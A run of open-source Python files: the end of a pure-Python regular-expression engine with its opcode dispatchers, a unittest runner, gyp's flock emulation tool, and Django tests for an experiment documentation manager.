None if matching is not finished, ie must be resumed after child
contexts have been matched."""
while context.remaining_codes() > 0 and context.has_matched is None:
opcode = context.peek_code()
if not self.dispatch(opcode, context):
return None
if context.has_matched is None:
context.has_matched = False
return context.has_matched
def dispatch(self, opcode, context):
"""Dispatches a context on a given opcode. Returns True if the context
is done matching, False if it must be resumed when next encountered."""
#if self.executing_contexts.has_key(id(context)):
if id(context) in self.executing_contexts:
generator = self.executing_contexts[id(context)]
del self.executing_contexts[id(context)]
has_finished = next(generator)
else:
method = self.DISPATCH_TABLE.get(opcode, _OpcodeDispatcher.unknown)
has_finished = method(self, context)
if hasattr(has_finished, "__next__"): # avoid using the types module
generator = has_finished
has_finished = next(generator)
if not has_finished:
self.executing_contexts[id(context)] = generator
return has_finished
def op_success(self, ctx):
# end of pattern
#self._log(ctx, "SUCCESS")
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
return True
def op_failure(self, ctx):
# immediate failure
#self._log(ctx, "FAILURE")
ctx.has_matched = False
return True
def general_op_literal(self, ctx, compare, decorate=lambda x: x):
#print(ctx.peek_char())
if ctx.at_end() or not compare(decorate(ord(ctx.peek_char())),
decorate(ctx.peek_code(1))):
ctx.has_matched = False
ctx.skip_code(2)
ctx.skip_char(1)
def op_literal(self, ctx):
# match literal string
# <LITERAL> <code>
#self._log(ctx, "LITERAL", ctx.peek_code(1))
self.general_op_literal(ctx, operator.eq)
return True
def op_not_literal(self, ctx):
# match anything that is not the given literal character
# <NOT_LITERAL> <code>
#self._log(ctx, "NOT_LITERAL", ctx.peek_code(1))
self.general_op_literal(ctx, operator.ne)
return True
def op_literal_ignore(self, ctx):
# match literal regardless of case
# <LITERAL_IGNORE> <code>
#self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
self.general_op_literal(ctx, operator.eq, ctx.state.lower)
return True
def op_not_literal_ignore(self, ctx):
# match literal regardless of case
# <LITERAL_IGNORE> <code>
#self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
self.general_op_literal(ctx, operator.ne, ctx.state.lower)
return True
def op_at(self, ctx):
# match at given position
# <AT> <code>
#self._log(ctx, "AT", ctx.peek_code(1))
if not self.at_dispatcher.dispatch(ctx.peek_code(1), ctx):
ctx.has_matched = False
#print('_sre.py:line693, update context.has_matched variable')
return True
ctx.skip_code(2)
return True
def op_category(self, ctx):
# match at given category
# <CATEGORY> <code>
#self._log(ctx, "CATEGORY", ctx.peek_code(1))
if ctx.at_end() or not self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
ctx.has_matched = False
#print('_sre.py:line703, update context.has_matched variable')
return True
ctx.skip_code(2)
ctx.skip_char(1)
return True
def op_any(self, ctx):
# match anything (except a newline)
# <ANY>
#self._log(ctx, "ANY")
if ctx.at_end() or ctx.at_linebreak():
ctx.has_matched = False
#print('_sre.py:line714, update context.has_matched variable')
return True
ctx.skip_code(1)
ctx.skip_char(1)
return True
def op_any_all(self, ctx):
# match anything
# <ANY_ALL>
#self._log(ctx, "ANY_ALL")
if ctx.at_end():
ctx.has_matched = False
#print('_sre.py:line725, update context.has_matched variable')
return True
ctx.skip_code(1)
ctx.skip_char(1)
return True
def general_op_in(self, ctx, decorate=lambda x: x):
#self._log(ctx, "OP_IN")
#print('general_op_in')
if ctx.at_end():
ctx.has_matched = False
#print('_sre.py:line734, update context.has_matched variable')
return
skip = ctx.peek_code(1)
ctx.skip_code(2) # set op pointer to the set code
#print(ctx.peek_char(), ord(ctx.peek_char()),
# decorate(ord(ctx.peek_char())))
if not self.check_charset(ctx, decorate(ord(ctx.peek_char()))):
#print('_sre.py:line738, update context.has_matched variable')
ctx.has_matched = False
return
ctx.skip_code(skip - 1)
ctx.skip_char(1)
#print('end:general_op_in')
def op_in(self, ctx):
# match set member (or non_member)
# <IN> <skip> <set>
#self._log(ctx, "OP_IN")
self.general_op_in(ctx)
return True
def op_in_ignore(self, ctx):
# match set member (or non_member), disregarding case of current char
# <IN_IGNORE> <skip> <set>
#self._log(ctx, "OP_IN_IGNORE")
self.general_op_in(ctx, ctx.state.lower)
return True
def op_jump(self, ctx):
# jump forward
# <JUMP> <offset>
#self._log(ctx, "JUMP", ctx.peek_code(1))
ctx.skip_code(ctx.peek_code(1) + 1)
return True
# skip info
# <INFO> <skip>
op_info = op_jump
def op_mark(self, ctx):
# set mark
# <MARK> <gid>
#self._log(ctx, "OP_MARK", ctx.peek_code(1))
ctx.state.set_mark(ctx.peek_code(1), ctx.string_position)
ctx.skip_code(2)
return True
def op_branch(self, ctx):
# alternation
# <BRANCH> <0=skip> code <JUMP> ... <NULL>
#self._log(ctx, "BRANCH")
ctx.state.marks_push()
ctx.skip_code(1)
current_branch_length = ctx.peek_code(0)
while current_branch_length:
# The following tries to shortcut branches starting with a
# (unmatched) literal. _sre.c also shortcuts charsets here.
if not (ctx.peek_code(1) == OPCODES["literal"] and \
(ctx.at_end() or ctx.peek_code(2) != ord(ctx.peek_char()))):
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(1)
#print("_sre.py:803:op_branch")
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.marks_pop_keep()
ctx.skip_code(current_branch_length)
current_branch_length = ctx.peek_code(0)
ctx.state.marks_pop_discard()
ctx.has_matched = False
#print('_sre.py:line805, update context.has_matched variable')
yield True
def op_repeat_one(self, ctx):
# match repeated sequence (maximizing).
# this operator only works if the repeated item is exactly one character
# wide, and we're not already collecting backtracking points.
# <REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
mincount = ctx.peek_code(2)
maxcount = ctx.peek_code(3)
#print("repeat one", mincount, maxcount)
#self._log(ctx, "REPEAT_ONE", mincount, maxcount)
if ctx.remaining_chars() < mincount:
ctx.has_matched = False
yield True
ctx.state.string_position = ctx.string_position
count = self.count_repetitions(ctx, maxcount)
ctx.skip_char(count)
if count < mincount:
ctx.has_matched = False
yield True
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
# tail is empty. we're finished
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
yield True
ctx.state.marks_push()
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["literal"]:
# Special case: Tail starts with a literal. Skip positions where
# the rest of the pattern cannot possibly match.
char = ctx.peek_code(ctx.peek_code(1) + 2)
while True:
while count >= mincount and \
(ctx.at_end() or ord(ctx.peek_char()) != char):
ctx.skip_char(-1)
count -= 1
if count < mincount:
break
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print("_sre.py:856:push_new_context")
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.skip_char(-1)
count -= 1
ctx.state.marks_pop_keep()
else:
# General case: backtracking
while count >= mincount:
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.skip_char(-1)
count -= 1
ctx.state.marks_pop_keep()
ctx.state.marks_pop_discard()
ctx.has_matched = False
#ctx.has_matched = True # <== this should be True (so match object gets returned to program)
yield True
def op_min_repeat_one(self, ctx):
# match repeated sequence (minimizing)
# <MIN_REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
mincount = ctx.peek_code(2)
maxcount = ctx.peek_code(3)
#self._log(ctx, "MIN_REPEAT_ONE", mincount, maxcount)
if ctx.remaining_chars() < mincount:
ctx.has_matched = False
yield True
ctx.state.string_position = ctx.string_position
if mincount == 0:
count = 0
else:
count = self.count_repetitions(ctx, mincount)
if count < mincount:
ctx.has_matched = False
#print('_sre.py:line891, update context.has_matched variable')
yield True
ctx.skip_char(count)
if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
# tail is empty. we're finished
ctx.state.string_position = ctx.string_position
ctx.has_matched = True
yield True
ctx.state.marks_push()
while maxcount == MAXREPEAT or count <= maxcount:
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print('_sre.py:916:push new context')
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.string_position = ctx.string_position
if self.count_repetitions(ctx, 1) == 0:
break
ctx.skip_char(1)
count += 1
ctx.state.marks_pop_keep()
ctx.state.marks_pop_discard()
ctx.has_matched = False
yield True
def op_repeat(self, ctx):
# create repeat context. all the hard work is done by the UNTIL
# operator (MAX_UNTIL, MIN_UNTIL)
# <REPEAT> <skip> <1=min> <2=max> item <UNTIL> tail
#self._log(ctx, "REPEAT", ctx.peek_code(2), ctx.peek_code(3))
#if ctx.state.repeat is None:
# print("951:ctx.state.repeat is None")
# #ctx.state.repeat=_RepeatContext(ctx)
repeat = _RepeatContext(ctx)
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
#print("_sre.py:941:push new context", id(child_context))
#print(child_context.state.repeat)
#print(ctx.state.repeat)
# are these two yields causing the issue?
yield False
ctx.state.repeat = repeat.previous
ctx.has_matched = child_context.has_matched
yield True
def op_max_until(self, ctx):
# maximizing repeat
# <REPEAT> <skip> <1=min> <2=max> item <MAX_UNTIL> tail
repeat = ctx.state.repeat
#print("op_max_until") #, id(ctx.state.repeat))
if repeat is None:
#print(id(ctx), id(ctx.state))
raise RuntimeError("Internal re error: MAX_UNTIL without REPEAT.")
mincount = repeat.peek_code(2)
maxcount = repeat.peek_code(3)
ctx.state.string_position = ctx.string_position
count = repeat.count + 1
#self._log(ctx, "MAX_UNTIL", count)
if count < mincount:
# not enough matches
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
if (count < maxcount or maxcount == MAXREPEAT) \
and ctx.state.string_position != repeat.last_position:
# we may have enough matches, if we can match another item, do so
repeat.count = count
ctx.state.marks_push()
save_last_position = repeat.last_position # zero-width match protection
repeat.last_position = ctx.state.string_position
child_context = repeat.push_new_context(4)
yield False
repeat.last_position = save_last_position
if child_context.has_matched:
ctx.state.marks_pop_discard()
ctx.has_matched = True
yield True
ctx.state.marks_pop()
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
# cannot match more repeated items here. make sure the tail matches
ctx.state.repeat = repeat.previous
child_context = ctx.push_new_context(1)
#print("_sre.py:987:op_max_until")
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
yield True
def op_min_until(self, ctx):
# minimizing repeat
# <REPEAT> <skip> <1=min> <2=max> item <MIN_UNTIL> tail
repeat = ctx.state.repeat
if repeat is None:
raise RuntimeError("Internal re error: MIN_UNTIL without REPEAT.")
mincount = repeat.peek_code(2)
maxcount = repeat.peek_code(3)
ctx.state.string_position = ctx.string_position
count = repeat.count + 1
#self._log(ctx, "MIN_UNTIL", count)
if count < mincount:
# not enough matches
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
# see if the tail matches
ctx.state.marks_push()
ctx.state.repeat = repeat.previous
child_context = ctx.push_new_context(1)
#print('_sre.py:1022:push new context')
yield False
if child_context.has_matched:
ctx.has_matched = True
yield True
ctx.state.repeat = repeat
ctx.state.string_position = ctx.string_position
ctx.state.marks_pop()
# match more until tail matches
if count >= maxcount and maxcount != MAXREPEAT:
ctx.has_matched = False
#print('_sre.py:line1022, update context.has_matched variable')
yield True
repeat.count = count
child_context = repeat.push_new_context(4)
yield False
ctx.has_matched = child_context.has_matched
if not ctx.has_matched:
repeat.count = count - 1
ctx.state.string_position = ctx.string_position
yield True
def general_op_groupref(self, ctx, decorate=lambda x: x):
group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
if group_start is None or group_end is None or group_end < group_start:
ctx.has_matched = False
return True
while group_start < group_end:
if ctx.at_end() or decorate(ord(ctx.peek_char())) \
!= decorate(ord(ctx.state.string[group_start])):
ctx.has_matched = False
#print('_sre.py:line1042, update context.has_matched variable')
return True
group_start += 1
ctx.skip_char(1)
ctx.skip_code(2)
return True
def op_groupref(self, ctx):
# match backreference
# <GROUPREF> <zero-based group index>
#self._log(ctx, "GROUPREF", ctx.peek_code(1))
return self.general_op_groupref(ctx)
def op_groupref_ignore(self, ctx):
# match backreference case-insensitive
# <GROUPREF_IGNORE> <zero-based group index>
#self._log(ctx, "GROUPREF_IGNORE", ctx.peek_code(1))
return self.general_op_groupref(ctx, ctx.state.lower)
def op_groupref_exists(self, ctx):
# <GROUPREF_EXISTS> <group> <skip> codeyes <JUMP> codeno ...
#self._log(ctx, "GROUPREF_EXISTS", ctx.peek_code(1))
group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
if group_start is None or group_end is None or group_end < group_start:
ctx.skip_code(ctx.peek_code(2) + 1)
else:
ctx.skip_code(3)
return True
def op_assert(self, ctx):
# assert subpattern
# <ASSERT> <skip> <back> <pattern>
#self._log(ctx, "ASSERT", ctx.peek_code(2))
ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
if ctx.state.string_position < 0:
ctx.has_matched = False
yield True
child_context = ctx.push_new_context(3)
yield False
if child_context.has_matched:
ctx.skip_code(ctx.peek_code(1) + 1)
else:
ctx.has_matched = False
yield True
def op_assert_not(self, ctx):
# assert not subpattern
# <ASSERT_NOT> <skip> <back> <pattern>
#self._log(ctx, "ASSERT_NOT", ctx.peek_code(2))
ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
if ctx.state.string_position >= 0:
child_context = ctx.push_new_context(3)
yield False
if child_context.has_matched:
ctx.has_matched = False
yield True
ctx.skip_code(ctx.peek_code(1) + 1)
yield True
def unknown(self, ctx):
#self._log(ctx, "UNKNOWN", ctx.peek_code())
raise RuntimeError("Internal re error. Unknown opcode: %s" % ctx.peek_code())
def check_charset(self, ctx, char):
"""Checks whether a character matches set of arbitrary length. Assumes
the code pointer is at the first member of the set."""
self.set_dispatcher.reset(char)
save_position = ctx.code_position
result = None
while result is None:
result = self.set_dispatcher.dispatch(ctx.peek_code(), ctx)
ctx.code_position = save_position
#print("_sre.py:1123:check_charset", result)
return result
def count_repetitions(self, ctx, maxcount):
"""Returns the number of repetitions of a single item, starting from the
current string position. The code pointer is expected to point to a
REPEAT_ONE operation (with the repeated 4 ahead)."""
count = 0
real_maxcount = ctx.state.end - ctx.string_position
if maxcount < real_maxcount and maxcount != MAXREPEAT:
real_maxcount = maxcount
# XXX could special case every single character pattern here, as in C.
# This is a general solution, a bit hackisch, but works and should be
# efficient.
code_position = ctx.code_position
string_position = ctx.string_position
ctx.skip_code(4)
reset_position = ctx.code_position
while count < real_maxcount:
# this works because the single character pattern is followed by
# a success opcode
ctx.code_position = reset_position
self.dispatch(ctx.peek_code(), ctx)
#print("count_repetitions", ctx.has_matched, count)
if ctx.has_matched is False: # could be None as well
break
count += 1
ctx.has_matched = None
ctx.code_position = code_position
ctx.string_position = string_position
return count
def _log(self, context, opname, *args):
arg_string = ("%s " * len(args)) % args
_log("|%s|%s|%s %s" % (context.pattern_codes,
context.string_position, opname, arg_string))
_OpcodeDispatcher.build_dispatch_table(OPCODES, "op_")
class _CharsetDispatcher(_Dispatcher):
def __init__(self):
self.ch_dispatcher = _ChcodeDispatcher()
def reset(self, char):
self.char = char
self.ok = True
def set_failure(self, ctx):
return not self.ok
def set_literal(self, ctx):
# <LITERAL> <code>
if ctx.peek_code(1) == self.char:
return self.ok
else:
ctx.skip_code(2)
def set_category(self, ctx):
# <CATEGORY> <code>
if self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
return self.ok
else:
ctx.skip_code(2)
def set_charset(self, ctx):
# <CHARSET> <bitmap> (16 bits per code word)
char_code = self.char
ctx.skip_code(1) # point to beginning of bitmap
if CODESIZE == 2:
if char_code < 256 and ctx.peek_code(char_code >> 4) \
& (1 << (char_code & 15)):
return self.ok
ctx.skip_code(16) # skip bitmap
else:
if char_code < 256 and ctx.peek_code(char_code >> 5) \
& (1 << (char_code & 31)):
return self.ok
ctx.skip_code(8) # skip bitmap
def set_range(self, ctx):
# <RANGE> <lower> <upper>
if ctx.peek_code(1) <= self.char <= ctx.peek_code(2):
return self.ok
ctx.skip_code(3)
def set_negate(self, ctx):
self.ok = not self.ok
ctx.skip_code(1)
#fixme brython. array module doesn't exist
def set_bigcharset(self, ctx):
raise NotImplementationError("_sre.py: set_bigcharset, array not implemented")
# <BIGCHARSET> <blockcount> <256 blockindices> <blocks>
char_code = self.char
count = ctx.peek_code(1)
ctx.skip_code(2)
if char_code < 65536:
block_index = char_code >> 8
# NB: there are CODESIZE block indices per bytecode
a = array.array("B")
a.fromstring(array.array(CODESIZE == 2 and "H" or "I",
[ctx.peek_code(block_index // CODESIZE)]).tostring())
block = a[block_index % CODESIZE]
ctx.skip_code(256 // CODESIZE) # skip block indices
block_value = ctx.peek_code(block * (32 // CODESIZE)
+ ((char_code & 255) >> (CODESIZE == 2 and 4 or 5)))
if block_value & (1 << (char_code & ((8 * CODESIZE) - 1))):
return self.ok
else:
ctx.skip_code(256 // CODESIZE) # skip block indices
ctx.skip_code(count * (32 // CODESIZE)) # skip blocks
def unknown(self, ctx):
return False
_CharsetDispatcher.build_dispatch_table(OPCODES, "set_")
class _AtcodeDispatcher(_Dispatcher):
def at_beginning(self, ctx):
return ctx.at_beginning()
at_beginning_string = at_beginning
def at_beginning_line(self, ctx):
return ctx.at_beginning() or _is_linebreak(ctx.peek_char(-1))
def at_end(self, ctx):
return (ctx.remaining_chars() == 1 and ctx.at_linebreak()) or ctx.at_end()
def at_end_line(self, ctx):
return ctx.at_linebreak() or ctx.at_end()
def at_end_string(self, ctx):
return ctx.at_end()
def at_boundary(self, ctx):
return ctx.at_boundary(_is_word)
def at_non_boundary(self, ctx):
return not ctx.at_boundary(_is_word)
def at_loc_boundary(self, ctx):
return ctx.at_boundary(_is_loc_word)
def at_loc_non_boundary(self, ctx):
return not ctx.at_boundary(_is_loc_word)
def at_uni_boundary(self, ctx):
return ctx.at_boundary(_is_uni_word)
def at_uni_non_boundary(self, ctx):
return not ctx.at_boundary(_is_uni_word)
def unknown(self, ctx):
return False
_AtcodeDispatcher.build_dispatch_table(ATCODES, "")
class _ChcodeDispatcher(_Dispatcher):
def category_digit(self, ctx):
return _is_digit(ctx.peek_char())
def category_not_digit(self, ctx):
return not _is_digit(ctx.peek_char())
def category_space(self, ctx):
return _is_space(ctx.peek_char())
def category_not_space(self, ctx):
return not _is_space(ctx.peek_char())
def category_word(self, ctx):
return _is_word(ctx.peek_char())
def category_not_word(self, ctx):
return not _is_word(ctx.peek_char())
def category_linebreak(self, ctx):
return _is_linebreak(ctx.peek_char())
def category_not_linebreak(self, ctx):
return not _is_linebreak(ctx.peek_char())
def category_loc_word(self, ctx):
return _is_loc_word(ctx.peek_char())
def category_loc_not_word(self, ctx):
return not _is_loc_word(ctx.peek_char())
def category_uni_digit(self, ctx):
return ctx.peek_char().isdigit()
def category_uni_not_digit(self, ctx):
return not ctx.peek_char().isdigit()
def category_uni_space(self, ctx):
return ctx.peek_char().isspace()
def category_uni_not_space(self, ctx):
return not ctx.peek_char().isspace()
def category_uni_word(self, ctx):
return _is_uni_word(ctx.peek_char())
def category_uni_not_word(self, ctx):
return not _is_uni_word(ctx.peek_char())
def category_uni_linebreak(self, ctx):
return ord(ctx.peek_char()) in _uni_linebreaks
def category_uni_not_linebreak(self, ctx):
return ord(ctx.peek_char()) not in _uni_linebreaks
def unknown(self, ctx):
return False
_ChcodeDispatcher.build_dispatch_table(CHCODES, "")
_ascii_char_info = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 6, 2,
2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 25, 25, 25, 25, 25, 25, 25,
25, 25, 0, 0, 0, 0, 0, 0, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0,
0, 0, 16, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0, 0, 0, 0 ]
def _is_digit(char):
code = ord(char)
return code < 128 and _ascii_char_info[code] & 1
def _is_space(char):
code = ord(char)
return code < 128 and _ascii_char_info[code] & 2
def _is_word(char):
# NB: non-ASCII chars aren't words according to _sre.c
code = ord(char)
return code < 128 and _ascii_char_info[code] & 16
def _is_loc_word(char):
return (not (ord(char) & ~255) and char.isalnum()) or char == '_'
def _is_uni_word(char):
# not valid in python 3
#return unichr(ord(char)).isalnum() or char == '_'
return chr(ord(char)).isalnum() or char == '_'
def _is_linebreak(char):
return char == "\n"
# Static list of all unicode codepoints reported by Py_UNICODE_ISLINEBREAK.
_uni_linebreaks = [10, 13, 28, 29, 30, 133, 8232, 8233]
def _log(message):
if 0:
print(message)
| agpl-3.0 |
SummerLW/Perf-Insight-Report | third_party/graphy/graphy/all_tests.py | 36 | 1599 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run all tests from *_test.py files."""
import os
import unittest
def ModuleName(filename, base_dir):
"""Given a filename, convert to the python module name."""
filename = filename.replace(base_dir, '')
filename = filename.lstrip(os.path.sep)
filename = filename.replace(os.path.sep, '.')
if filename.endswith('.py'):
filename = filename[:-3]
return filename
def FindTestModules():
"""Return names of any test modules (*_test.py)."""
tests = []
start_dir = os.path.dirname(os.path.abspath(__file__))
for dir, subdirs, files in os.walk(start_dir):
if dir.endswith('/.svn') or '/.svn/' in dir:
continue
tests.extend(ModuleName(os.path.join(dir, f), start_dir) for f
in files if f.endswith('_test.py'))
return tests
def AllTests():
suites = unittest.defaultTestLoader.loadTestsFromNames(FindTestModules())
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main(module=None, defaultTest='__main__.AllTests')
| bsd-3-clause |
tpratama/warkop-TC | assets/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/flock_tool.py | 604 | 1533 | #!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""These functions are executed via gyp-flock-tool when using the Makefile
generator. Used on systems that don't have a built-in flock."""
import fcntl
import os
import struct
import subprocess
import sys
def main(args):
executor = FlockTool()
executor.Dispatch(args)
class FlockTool(object):
"""This class emulates the 'flock' command."""
def Dispatch(self, args):
"""Dispatches a string command to a method."""
if len(args) < 1:
raise Exception("Not enough arguments")
method = "Exec%s" % self._CommandifyName(args[0])
getattr(self, method)(*args[1:])
def _CommandifyName(self, name_string):
"""Transforms a tool name like copy-info-plist to CopyInfoPlist"""
return name_string.title().replace('-', '')
def ExecFlock(self, lockfile, *cmd_list):
"""Emulates the most basic behavior of Linux's flock(1)."""
# Rely on exception handling to report errors.
# Note that the stock python on SunOS has a bug
# where fcntl.flock(fd, LOCK_EX) always fails
# with EBADF, that's why we use this F_SETLK
# hack instead.
fd = os.open(lockfile, os.O_WRONLY|os.O_NOCTTY|os.O_CREAT, 0666)
op = struct.pack('hhllhhl', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
fcntl.fcntl(fd, fcntl.F_SETLK, op)
return subprocess.call(cmd_list)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| mit |
MOOCworkbench/MOOCworkbench | docs_manager/tests/tests.py | 1 | 6482 | from unittest.mock import patch
from django.contrib.auth.models import User
from django.core.management import call_command
from django.shortcuts import reverse
from django.test import Client, TestCase
from dataschema_manager.models import DataSchema
from experiments_manager.models import Experiment
from git_manager.models import GitRepository
from helpers.helper import ExperimentPackageTypeMixin
from user_manager.models import WorkbenchUser
class DocsManagerTestCase(TestCase):
def setUp(self):
call_command('loaddata', 'fixtures/steps.json', verbosity=0)
call_command('loaddata', 'fixtures/measures.json', verbosity=0)
call_command('loaddata', 'fixtures/package_categories_languages.json', verbosity=0)
call_command('loaddata', 'fixtures/cookiecutter.json', verbosity=0)
self.user = User.objects.create_user('test', 'test@test.nl', 'test')
self.workbench_user = WorkbenchUser.objects.get(user=self.user)
self.second_user = User.objects.create_user('test2', 'test@test.nl', 'test2')
self.git_repo = GitRepository.objects.create(name='Experiment', owner=self.workbench_user, github_url='https://github')
schema = DataSchema(name='main')
schema.save()
self.experiment = Experiment.objects.create(title='Experiment',
description='test',
owner=self.workbench_user,
git_repo=self.git_repo,
language_id=2,
template_id=2,
schema=schema)
self.client = Client()
self.client.login(username='test', password='test')
@patch('git_manager.helpers.language_helper.GitHubHelper')
@patch('git_manager.helpers.language_helper.SphinxHelper')
def test_doc_experiment_view(self, mock_gh_helper, mock_sphinx_helper):
"""
Test if the DocExperimentView loads, for the default documentation view.
:param mock_gh_helper: Autoloaded by the mock framework
:param mock_sphinx_helper: Autoloaded by the mock framework
:return:
"""
response = self.client.get(reverse('docs_view', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.status_code, 302)
@patch('git_manager.helpers.language_helper.GitHubHelper')
@patch('git_manager.helpers.language_helper.SphinxHelper')
def test_doc_experiment_view_with_page_slug(self, mock_gh_helper, mock_sphinx_helper):
"""
Test if the DocExperimentView loads, given a pageslug to load.
:param mock_gh_helper: Autoloaded by the mock framework
:param mock_sphinx_helper: Autoloaded by the mock framework
:return:
"""
response = self.client.get(reverse('docs_view', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE,
'page_slug': 'test'}))
self.assertEqual(response.status_code, 302)
def test_doc_status_view(self):
"""
Test if the doc status view loads successfully.
:return:
"""
response = self.client.get(reverse('docs_status', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.context['object'], self.experiment)
self.assertEqual(response.context['docs'], self.experiment.docs)
def test_toggle_doc_status_true_to_false(self):
"""
Test if the documentation status is toggled from True to False.
:return:
"""
docs = self.experiment.docs
docs.enabled = True
docs.save()
response = self.client.get(reverse('toggle_docs_status', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.status_code, 302)
docs.refresh_from_db()
self.assertFalse(docs.enabled)
@patch('docs_manager.views.GitHubHelper')
@patch('docs_manager.views.GitHelper')
def test_toggle_doc_status_false_to_true(self, mock_gh_helper, mock_git_helper):
"""
Test if the documentation status is toggled from True to False.
:return:
"""
docs = self.experiment.docs
docs.enabled = False
docs.save()
response = self.client.get(reverse('toggle_docs_status', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.status_code, 302)
docs.refresh_from_db()
self.assertTrue(docs.enabled)
@patch('git_manager.helpers.language_helper.GitHubHelper')
@patch('docs_manager.views.GitHelper')
@patch('git_manager.helpers.language_helper.SphinxHelper')
def test_docs_generate_enabled(self, mock_gh_helper, mock_git_helper, mock_sphinx_helper):
"""
Test if the documentation view can be loaded.
:return:
"""
response = self.client.get(reverse('docs_generate', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.status_code, 200)
@patch('git_manager.helpers.language_helper.GitHubHelper')
@patch('docs_manager.views.GitHelper')
@patch('git_manager.helpers.language_helper.SphinxHelper')
def test_docs_generate_disabled(self, mock_gh_helper, mock_git_helper, mock_sphinx_helper):
"""
Test if the documentation view can be loaded.
:return:
"""
docs = self.experiment.docs
docs.enabled = False
docs.save()
response = self.client.get(reverse('docs_generate', kwargs={'object_id': 1,
'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
self.assertEqual(response.status_code, 200)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.